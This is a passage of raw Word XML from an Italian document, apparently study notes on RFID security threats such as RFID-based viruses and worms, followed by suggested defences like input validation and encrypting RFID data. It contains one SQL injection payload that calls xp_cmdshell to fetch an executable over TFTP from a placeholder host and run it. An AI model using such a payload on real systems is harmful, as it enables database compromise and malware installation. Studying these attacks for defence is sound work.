      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; EXEC Master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xpcmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>% GET myexploit.exe &amp;</w:t>
      </w:r>
      <w:r w:rsidR="00050355" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myexploit‘ --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00311BD2" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~12" w:hAnsi="Times-Bold~12" w:cs="Times-Bold~12"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~12" w:hAnsi="Times-Bold~12" w:cs="Times-Bold~12"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RFID-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~12" w:hAnsi="Times-Bold~12" w:cs="Times-Bold~12"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~12" w:hAnsi="Times-Bold~12" w:cs="Times-Bold~12"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~12" w:hAnsi="Times-Bold~12" w:cs="Times-Bold~12"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Viruses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRPr="00FB563C" w:rsidRDefault="00FB563C" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB563C">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~12" w:hAnsi="Times-Bold~12" w:cs="Times-Bold~12"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Virus di pochi kb che possono infettare l’intero sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867FE" w:rsidRDefault="009B3313" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Invece di scaricare il virus da remoto sono stati presentati alcuni virus di pochi kb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00982" w:rsidRPr="00B867FE" w:rsidRDefault="00F00982" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00FB563C" w:rsidP="00F00982">
      <w:r>
        <w:t>POSSIBILI SOLUZIONI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>overflows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA525B">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; utilizzare linguaggi di alto livello per il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA525B">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>middleware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA525B">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (JAVA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Insertion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cross code</w:t>
      </w:r>
      <w:r w:rsidR="00AA525B">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (validare gli input prima di utilizzarli)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA525B">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (validare il codice prima di fare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA525B">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA525B">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRPr="00050355" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RFID Worm</w:t>
      </w:r>
      <w:r w:rsidR="00AA525B" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA525B" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cifrare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA525B" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA525B" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l’rfid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA525B" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA525B" w:rsidRPr="00050355" w:rsidRDefault="00AA525B" w:rsidP="00AA525B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~12" w:hAnsi="Times-Bold~12" w:cs="Times-Bold~12"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~12" w:hAnsi="Times-Bold~12" w:cs="Times-Bold~12"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RFID-Based Viruses</w:t>
      </w:r>
      <w:r w:rsidR="008B3B17" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~12" w:hAnsi="Times-Bold~12" w:cs="Times-Bold~12"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B3B17" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B3B17" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cifrare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B3B17" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B3B17" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l’rfid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B3B17" w:rsidRPr="00050355">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRPr="00050355" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRPr="00050355" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRPr="00050355" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F00982" w:rsidRPr="00050355" w:rsidRDefault="00F00982" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F00982" w:rsidRPr="00050355" w:rsidSect="002C46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-Italic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itstreamVeraSans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Bold~2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ont332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Bold~12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41292"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BE650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057569"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E5C01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oNotTrackMoves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1B1B89"/>
    <w:rsid w:val="00050355"/>
    <w:rsid w:val="000B2FB4"/>
    <w:rsid w:val="00103705"/>
    <w:rsid w:val="00120283"/>
    <w:rsid w:val="00162D37"/>
    <w:rsid w:val="001B1B89"/>
    <w:rsid w:val="002259B6"/>
    <w:rsid w:val="0027195E"/>
    <w:rsid w:val="002C032B"/>
    <w:rsid w:val="002C4602"/>
    <w:rsid w:val="002D60FC"/>
    <w:rsid w:val="00311BD2"/>
    <w:rsid w:val="0033588F"/>
    <w:rsid w:val="004161E4"/>
    <w:rsid w:val="00496616"/>
    <w:rsid w:val="00524C97"/>
    <w:rsid w:val="00544173"/>
    <w:rsid w:val="005F579C"/>
    <w:rsid w:val="006A4E7F"/>
    <w:rsid w:val="00711BD0"/>
    <w:rsid w:val="00787239"/>
    <w:rsid w:val="007C44AE"/>
    <w:rsid w:val="007D2ACA"/>
    <w:rsid w:val="008550CD"/>
    <w:rsid w:val="008B3B17"/>
    <w:rsid w:val="009B3313"/>
    <w:rsid w:val="00A4657F"/>
    <w:rsid w:val="00AA525B"/>
    <w:rsid w:val="00B3060B"/>
    <w:rsid w:val="00B867FE"/>
    <w:rsid w:val="00C548D0"/>
    <w:rsid w:val="00C77599"/>
    <w:rsid w:val="00D232F1"/>
    <w:rsid w:val="00D7625B"/>
    <w:rsid w:val="00DF136D"/>
    <w:rsid w:val="00E27761"/>
    <w:rsid w:val="00EB7A7F"/>
    <w:rsid w:val="00F00982"/>
    <w:rsid w:val="00F40DC6"/>
    <w:rsid w:val="00F84672"/>
    <w:rsid w:val="00FA5D72"/>
    <w:rsid w:val="00FB563C"/>
    <w:rsid w:val="00FE4B69"/>
    <w:rsid w:val="00FF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qFormat/>
    <w:rsid w:val="00496616"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="Titolo3Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D232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style-span">
    <w:name w:val="apple-style-span"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:rsid w:val="00A4657F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:rsid w:val="00A4657F"/>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A4657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96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232F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Carpredefinitoparagrafo"/>
    <w:rsid w:val="00D232F1"/>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentovisitato">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:rsid w:val="002259B6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rsid w:val="0005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50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.wikipedia.org/wiki/Tecnologia" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/wiki/Titolo_di_viaggio_elettronico" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/wiki/Pallet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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/wiki/Hertz" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/wiki/ISO_14443" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/wiki/Interporto" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rfidiot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it.wikipedia.org/wiki/Telepass" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/wiki/Autovettur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t.wikipedia.org/wiki/Organizzazione_Internazionale_per_le_Standardizzazioni" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/wiki/Discoteca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it.wikipedia.org/wiki/Logistica" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.rf-dump.org/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/wiki/ISO_15693" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/wiki/Carro_(ferrovia)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t.wikipedia.org/wiki/General_purpose" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://it.wikipedia.org/w/index.php?title=ISO_18000&amp;action=edit&amp;redlink=1" TargetMode="Externa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9</Pages>
  <Words>2419</Words>
  <Characters>13793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{_oXoRy_}</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>{_oXoRy_}</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-24T08:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-05-10T10:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>